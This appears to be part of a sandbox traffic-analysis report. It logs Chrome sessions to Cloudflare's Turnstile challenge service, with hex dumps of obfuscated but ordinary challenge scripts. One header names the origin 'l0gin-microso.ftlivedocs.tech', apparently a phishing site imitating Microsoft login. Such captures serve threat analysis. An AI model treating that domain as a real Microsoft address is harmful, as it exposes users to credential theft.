                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Cookie: fNYe=896a8296dd752621a31badfb843ea3b9d58cbc46d6504a1582b16c1633cbccb4
                                                                                                                              2024-10-04 13:11:03 UTC516INHTTP/1.1 405 Method Not Allowed
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:03 GMT
                                                                                                                              Content-Length: 0
                                                                                                                              Connection: close
                                                                                                                              allow: POST
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Va%2FhMvJ%2BULxr9QQUl%2FAnbXp44pJpY83RbfEN3pWoGNvpBV36eftnvnMSYNi9Pr%2BRv8q3W7lIuMj0jIC1lVnWJmvPejCcJRKHydTiqe6DXGiRrptfgoRS27BprLuGPjEU1bABTV72Rtns1zC%2BpST2"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8cd56a66f8c2335a-EWR


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              22192.168.2.1749791104.18.95.414432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:03 UTC730OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cd56a630cf741e3&lang=auto HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/bth64/0x4AAAAAAAwd9hw5rvoDjM7I/auto/fbE/normal/auto/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:03 UTC301INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:03 GMT
                                                                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                                                                              Content-Length: 120417
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8cd56a675ced4397-EWR
                                                                                                                              2024-10-04 13:11:03 UTC1068INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 5a 4a 79 54 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32
                                                                                                                              Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qZJyT2={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2
                                                                                                                              2024-10-04 13:11:03 UTC1369INData Raw: 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22 3a 22 59 6f 75 72 20 66 65 65 64 62 61 63 6b 20 72 65 70 6f 72 74 20 68 61 73 20 62 65 65 6e 20 73 75 63 63 65 73 73 66 75 6c 6c 79 20 73 75 62 6d 69 74 74 65 64 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 69 66 72 61 6d 65 5f 61 6c 74 22 3a 22 57 69 64 67 65 74 25 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 69 6e 76 61 6c 69 64 5f 73 69 74 65 6b 65 79 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 73 69 74 65 6b 65 79 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74
                                                                                                                              Data Ascii: dback_report_output_subtitle":"Your feedback report has been successfully submitted","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20t
                                                                                                                              2024-10-04 13:11:03 UTC1369INData Raw: 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 35 34 38 30 36 31 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 31 31 32 37 29 5d 2c 65 4d 5b 67 49 28 36 33 30 29 5d 3d 21 5b 5d 2c 65 4d 5b 67 49 28 31 30 37 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 33 29 7b 69 66 28 68 33 3d 67 49 2c 65 4d 5b 68 33 28 36 33 30 29 5d 29 72 65 74 75 72 6e 3b 65 4d 5b 68 33 28 36 33 30 29 5d 3d 21 21 5b 5d 7d 2c 65 55 3d 30 2c 65 4e 5b 67 49 28 31 31 35 37 29 5d 3d 3d 3d 67 49 28 31 31 31 32 29 3f 65 4e 5b 67 49 28 31 35 38 38 29 5d 28 67 49 28 32 34 36 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28
                                                                                                                              Data Ascii: ak;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,548061),eM=this||self,eN=eM[gI(1127)],eM[gI(630)]=![],eM[gI(1071)]=function(h3){if(h3=gI,eM[h3(630)])return;eM[h3(630)]=!![]},eU=0,eN[gI(1157)]===gI(1112)?eN[gI(1588)](gI(246),function(){setTimeout(
                                                                                                                              2024-10-04 13:11:03 UTC1369INData Raw: 6f 6e 28 67 2c 68 2c 69 2c 68 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 29 7b 6b 3d 28 68 69 3d 67 49 2c 6a 3d 7b 7d 2c 6a 5b 68 69 28 38 38 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 46 2c 47 29 7b 72 65 74 75 72 6e 20 46 2b 47 7d 2c 6a 5b 68 69 28 36 37 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 46 2c 47 29 7b 72 65 74 75 72 6e 20 46 2b 47 7d 2c 6a 5b 68 69 28 32 37 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 46 2c 47 29 7b 72 65 74 75 72 6e 20 46 2b 47 7d 2c 6a 5b 68 69 28 37 37 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 46 2c 47 29 7b 72 65 74 75 72 6e 20 46 2b 47 7d 2c 6a 5b 68 69 28 31 31 35 38 29 5d 3d 68 69 28 31 33 38 36 29 2c 6a 5b 68 69 28 31 36 35 38 29 5d 3d 68 69 28 38 30 34 29 2c 6a 5b 68 69 28 36 37 37 29 5d 3d 68 69 28 39
                                                                                                                              Data Ascii: on(g,h,i,hi,j,k,l,m,n,o,s,x,B,C,D,E){k=(hi=gI,j={},j[hi(885)]=function(F,G){return F+G},j[hi(678)]=function(F,G){return F+G},j[hi(271)]=function(F,G){return F+G},j[hi(772)]=function(F,G){return F+G},j[hi(1158)]=hi(1386),j[hi(1658)]=hi(804),j[hi(677)]=hi(9
                                                                                                                              2024-10-04 13:11:03 UTC1369INData Raw: 68 6a 28 31 30 39 35 29 5d 3d 68 6a 28 38 33 34 29 2c 6a 3d 69 2c 6b 3d 64 5b 68 6a 28 31 32 32 35 29 5d 28 29 2c 6c 3d 6a 5b 68 6a 28 32 39 38 29 5d 2c 6b 5b 68 6a 28 32 30 32 29 5d 28 6c 29 3e 2d 31 29 3f 65 4d 5b 68 6a 28 31 33 33 33 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 6b 29 7b 68 6b 3d 68 6a 2c 65 4d 5b 68 6b 28 31 35 39 39 29 5d 28 29 7d 2c 31 65 33 29 3a 28 6d 3d 5b 68 6a 28 31 34 33 30 29 2b 64 2c 6a 5b 68 6a 28 37 34 32 29 5d 28 6a 5b 68 6a 28 31 34 30 31 29 5d 2c 65 29 2c 6a 5b 68 6a 28 37 34 32 29 5d 28 6a 5b 68 6a 28 31 32 31 34 29 5d 2c 66 29 2c 68 6a 28 31 31 36 33 29 2b 67 2c 6a 5b 68 6a 28 35 30 39 29 5d 2b 4a 53 4f 4e 5b 68 6a 28 31 35 31 37 29 5d 28 68 29 5d 5b 68 6a 28 31 30 34 31 29 5d 28 6a 5b 68 6a 28 31 30 39 35 29 5d 29 2c 65 4d
                                                                                                                              Data Ascii: hj(1095)]=hj(834),j=i,k=d[hj(1225)](),l=j[hj(298)],k[hj(202)](l)>-1)?eM[hj(1333)](function(hk){hk=hj,eM[hk(1599)]()},1e3):(m=[hj(1430)+d,j[hj(742)](j[hj(1401)],e),j[hj(742)](j[hj(1214)],f),hj(1163)+g,j[hj(509)]+JSON[hj(1517)](h)][hj(1041)](j[hj(1095)]),eM
                                                                                                                              2024-10-04 13:11:03 UTC1369INData Raw: 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 69 53 2c 63 2c 64 2c 65 2c 67 29 7b 69 66 28 69 53 3d 67 49 2c 63 3d 7b 27 70 63 64 56 77 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 2b 67 7d 2c 27 68 54 48 65 44 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 26 67 7d 2c 27 46 63 49 52 69 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 7c 67 7d 2c 27 53 70 51 47 62 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 3e 3e 67 7d 2c 27 42 64 4e 71 54 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 2d 67 7d 2c 27 53 6d 64 70 57 27 3a 69 53 28 37 39 33 29 2c 27 6e 78 48 4c 71 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72
                                                                                                                              Data Ascii: tInterval(function(iS,c,d,e,g){if(iS=gI,c={'pcdVw':function(f,g){return f+g},'hTHeD':function(f,g){return f&g},'FcIRi':function(f,g){return f|g},'SpQGb':function(f,g){return f>>g},'BdNqT':function(f,g){return f-g},'SmdpW':iS(793),'nxHLq':function(f){retur
                                                                                                                              2024-10-04 13:11:03 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 47 2c 48 2c 49 29 7b 72 65 74 75 72 6e 20 47 28 48 2c 49 29 7d 7d 2c 68 3d 3d 3d 6e 75 6c 6c 7c 7c 68 3d 3d 3d 76 6f 69 64 20 30 29 72 65 74 75 72 6e 20 6a 3b 66 6f 72 28 78 3d 6f 5b 69 59 28 38 33 33 29 5d 28 67 36 2c 68 29 2c 67 5b 69 59 28 31 36 30 31 29 5d 5b 69 59 28 31 32 37 38 29 5d 26 26 28 78 3d 78 5b 69 59 28 33 33 39 29 5d 28 67 5b 69 59 28 31 36 30 31 29 5d 5b 69 59 28 31 32 37 38 29 5d 28 68 29 29 29 2c 78 3d 67 5b 69 59 28 36 37 39 29 5d 5b 69 59 28 31 36 36 37 29 5d 26 26 67 5b 69 59 28 33 32 33 29 5d 3f 67 5b 69 59 28 36 37 39 29 5d 5b 69 59 28 31 36 36 37 29 5d 28 6e 65 77 20 67 5b 28 69 59 28 33 32 33 29 29 5d 28 78 29 29 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 69 5a 2c 48 29 7b 66 6f 72 28 69 5a 3d 69 59 2c 47 5b 69
                                                                                                                              Data Ascii: unction(G,H,I){return G(H,I)}},h===null||h===void 0)return j;for(x=o[iY(833)](g6,h),g[iY(1601)][iY(1278)]&&(x=x[iY(339)](g[iY(1601)][iY(1278)](h))),x=g[iY(679)][iY(1667)]&&g[iY(323)]?g[iY(679)][iY(1667)](new g[(iY(323))](x)):function(G,iZ,H){for(iZ=iY,G[i
                                                                                                                              2024-10-04 13:11:03 UTC1369INData Raw: 5b 6e 5d 5b 6a 30 28 32 30 32 29 5d 28 69 5b 6c 5b 6d 5d 5d 5b 6f 5d 29 26 26 28 67 38 28 69 5b 6c 5b 6d 5d 5d 5b 6f 5d 29 7c 7c 68 5b 6e 5d 5b 6a 30 28 31 36 33 31 29 5d 28 6b 5b 6a 30 28 31 36 36 36 29 5d 28 27 6f 2e 27 2c 69 5b 6c 5b 6d 5d 5d 5b 6f 5d 29 29 29 2c 6f 2b 2b 29 3b 7d 65 6c 73 65 20 68 5b 6e 5d 3d 69 5b 6c 5b 6d 5d 5d 5b 6a 30 28 31 35 39 35 29 5d 28 66 75 6e 63 74 69 6f 6e 28 76 29 7b 72 65 74 75 72 6e 27 6f 2e 27 2b 76 7d 29 7d 2c 67 39 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 6a 31 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 66 6f 72 28 6a 31 3d 67 49 2c 67 3d 7b 7d 2c 67 5b 6a 31 28 35 36 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 6e 2b 73 7d 2c 67 5b 6a 31 28 37 32 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                              Data Ascii: [n][j0(202)](i[l[m]][o])&&(g8(i[l[m]][o])||h[n][j0(1631)](k[j0(1666)]('o.',i[l[m]][o]))),o++);}else h[n]=i[l[m]][j0(1595)](function(v){return'o.'+v})},g9=function(f,j1,g,h,i,j,k,l,m){for(j1=gI,g={},g[j1(562)]=function(n,s){return n+s},g[j1(721)]=function(
                                                                                                                              2024-10-04 13:11:03 UTC1369INData Raw: 2c 27 64 4b 6e 65 61 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 69 55 67 68 48 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 68 7d 2c 27 4a 52 62 6b 47 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 5a 5a 7a 5a 73 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 64 6c 6b 73 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 68 44 41 6a 67 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 59 58 69 6a 48 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 51 51 4c 6c 6c 27 3a 66 75 6e 63
                                                                                                                              Data Ascii: ,'dKnea':function(h,i){return h>i},'iUghH':function(h,i){return i!=h},'JRbkG':function(h,i){return h*i},'ZZzZs':function(h,i){return h(i)},'dlksN':function(h,i){return h!=i},'hDAjg':function(h,i){return h-i},'YXijH':function(h,i){return h!=i},'QQLll':func
                                                                                                                              2024-10-04 13:11:03 UTC1369INData Raw: 35 29 5d 28 6f 2c 31 29 3f 28 4c 3d 30 2c 4a 5b 6a 46 28 31 36 33 31 29 5d 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3e 3e 3d 31 2c 43 2b 2b 29 3b 7d 65 6c 73 65 20 69 66 28 64 5b 6a 46 28 38 30 32 29 5d 28 6a 46 28 31 35 36 37 29 2c 6a 46 28 31 35 36 37 29 29 29 7b 66 6f 72 28 50 3d 31 2c 43 3d 30 3b 64 5b 6a 46 28 31 30 39 38 29 5d 28 43 2c 49 29 3b 4b 3d 4b 3c 3c 31 2e 35 34 7c 50 2c 64 5b 6a 46 28 31 34 34 36 29 5d 28 4c 2c 6f 2d 31 29 3f 28 4c 3d 30 2c 4a 5b 6a 46 28 31 36 33 31 29 5d 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3d 30 2c 43 2b 2b 29 3b 66 6f 72 28 50 3d 46 5b 6a 46 28 38 36 32 29 5d 28 30 29 2c 43 3d 30 3b 64 5b 6a 46 28 33 30 32 29 5d 28 31 36 2c 43 29 3b 4b 3d 64 5b 6a 46 28 31 34 33 35 29 5d 28 4b 2c 31 29 7c 31 26
                                                                                                                              Data Ascii: 5)](o,1)?(L=0,J[jF(1631)](s(K)),K=0):L++,P>>=1,C++);}else if(d[jF(802)](jF(1567),jF(1567))){for(P=1,C=0;d[jF(1098)](C,I);K=K<<1.54|P,d[jF(1446)](L,o-1)?(L=0,J[jF(1631)](s(K)),K=0):L++,P=0,C++);for(P=F[jF(862)](0),C=0;d[jF(302)](16,C);K=d[jF(1435)](K,1)|1&


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              23192.168.2.1749792104.18.95.414432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:03 UTC795OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/bth64/0x4AAAAAAAwd9hw5rvoDjM7I/auto/fbE/normal/auto/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:03 UTC210INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:03 GMT
                                                                                                                              Content-Type: image/png
                                                                                                                              Content-Length: 61
                                                                                                                              Connection: close
                                                                                                                              cache-control: max-age=2629800, public
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8cd56a68dee94368-EWR
                                                                                                                              2024-10-04 13:11:03 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                              Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              24192.168.2.174979335.190.80.14432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:04 UTC568OUTOPTIONS /report/v4?s=Va%2FhMvJ%2BULxr9QQUl%2FAnbXp44pJpY83RbfEN3pWoGNvpBV36eftnvnMSYNi9Pr%2BRv8q3W7lIuMj0jIC1lVnWJmvPejCcJRKHydTiqe6DXGiRrptfgoRS27BprLuGPjEU1bABTV72Rtns1zC%2BpST2 HTTP/1.1
                                                                                                                              Host: a.nel.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Origin: https://l0gin-microso.ftlivedocs.tech
                                                                                                                              Access-Control-Request-Method: POST
                                                                                                                              Access-Control-Request-Headers: content-type
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:04 UTC336INHTTP/1.1 200 OK
                                                                                                                              Content-Length: 0
                                                                                                                              access-control-max-age: 86400
                                                                                                                              access-control-allow-methods: OPTIONS, POST
                                                                                                                              access-control-allow-origin: *
                                                                                                                              access-control-allow-headers: content-type, content-length
                                                                                                                              date: Fri, 04 Oct 2024 13:11:03 GMT
                                                                                                                              Via: 1.1 google
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              25192.168.2.1749794104.18.95.414432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:04 UTC438OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:04 UTC210INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:04 GMT
                                                                                                                              Content-Type: image/png
                                                                                                                              Content-Length: 61
                                                                                                                              Connection: close
                                                                                                                              cache-control: max-age=2629800, public
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8cd56a6ca9f05e6d-EWR
                                                                                                                              2024-10-04 13:11:04 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                              Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              26192.168.2.1749795104.18.95.414432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:04 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cd56a630cf741e3&lang=auto HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:04 UTC301INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:04 GMT
                                                                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                                                                              Content-Length: 122108
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8cd56a6ceff943c1-EWR
                                                                                                                              2024-10-04 13:11:04 UTC1068INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 5a 4a 79 54 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74
                                                                                                                              Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qZJyT2={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"htt
                                                                                                                              2024-10-04 13:11:04 UTC1369INData Raw: 74 69 6e 67 25 32 30 6f 6e 6c 79 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 74 65 72 6d 73 22 3a 22 54 65 72 6d 73 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 76 65 72 69 66 79 69 6e 67 22 3a 22 56 65 72 69 66 79 69 6e 67 2e 2e 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 22 3a 22 48 61 76 69 6e 67 25 32 30 74 72 6f 75 62 6c 65 25 33 46 22 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22 3a 22 59 6f 75 72 20 66 65 65 64 62 61 63 6b 20 72 65 70 6f 72 74 20 68 61 73 20 62 65 65 6e 20 73 75 63 63 65 73 73 66 75 6c 6c 79 20 73 75 62 6d 69 74 74 65 64 22 2c 22 68 75 6d 61 6e 5f 62 75 74 74 6f 6e 5f 74 65 78 74 22 3a 22 56 65 72 69 66 79 25 32 30 79 6f
                                                                                                                              Data Ascii: ting%20only.","turnstile_footer_terms":"Terms","turnstile_verifying":"Verifying...","turnstile_feedback_report":"Having%20trouble%3F","feedback_report_output_subtitle":"Your feedback report has been successfully submitted","human_button_text":"Verify%20yo
